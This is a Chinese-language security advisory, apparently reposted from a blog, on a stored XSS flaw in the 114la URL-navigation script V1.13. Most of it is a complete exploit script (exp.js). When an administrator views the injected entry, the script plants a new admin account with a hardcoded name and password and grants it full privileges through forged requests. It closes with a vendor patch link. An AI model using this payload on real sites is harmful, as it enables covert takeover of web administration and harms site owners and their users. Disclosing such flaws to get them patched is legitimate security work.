影响版本:
114la V1.13
程序介绍:
114啦网址导航是目前国内使用率最高的网址导航之一,本网址导航生成系统为雨林木风自主研发.
漏洞分析:
程序当中的/url-submit/index.php对提交的数据未过滤或编码直接插入数据库,造成了储蓄性XSS漏洞
漏洞利用:
exp.js
- //添加一个管理员账户
- var siteurl = document.URL;
- siteurl = siteurl.replace(/(.*\/){0,}([^\.]+).*/ig,"$1");
- var username="sogili";//用户名
- var password="sb250";//密码
- var request = false;
- if(window.XMLHttpRequest) {
- request = new XMLHttpRequest();
- if(request.overrideMimeType) {
- request.overrideMimeType(‘text/xml’);
- }
- } else if(window.ActiveXObject) {
- var versions = [‘Microsoft.XMLHTTP’, ‘MSXML.XMLHTTP’, ‘Microsoft.XMLHTTP’, ‘Msxml2.XMLHTTP.7.0’,‘Msxml2.XMLHTTP.6.0’,‘Msxml2.XMLHTTP.5.0’, ‘Msxml2.XMLHTTP.4.0’, ‘MSXML2.XMLHTTP.3.0’, ‘MSXML2.XMLHTTP’];
- for(var i=0; i<versions.length; i++) {
- try {
- request = new ActiveXObject(versions[i]);
- } catch(e)
- {}
- }
- }
- var xmlhttp=request;
- xmlhttp.open("GET",siteurl+"/index.php?c=member", false);
- xmlhttp.setRequestHeader("Referer", siteurl);
- xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- xmlhttp.send();
- if (xmlhttp.responseText.indexOf(username)<0) {
- xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_add", false);
- xmlhttp.setRequestHeader("Referer", siteurl);
- xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
- xmlhttp.send("name=" + username + "&password=" + password + "&step=2");
- xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_edit", false);
- xmlhttp.setRequestHeader("Referer", siteurl);
- xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
- xmlhttp.send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan%5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username);
- }
解决方案:
厂商补丁:
114la
——-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.xiazaiba.com/html/114.html
信息来源:
<*来源: Sogili’s blog
链接: http://www.sogili.com/?action=show&id=2
*>
0 条评论。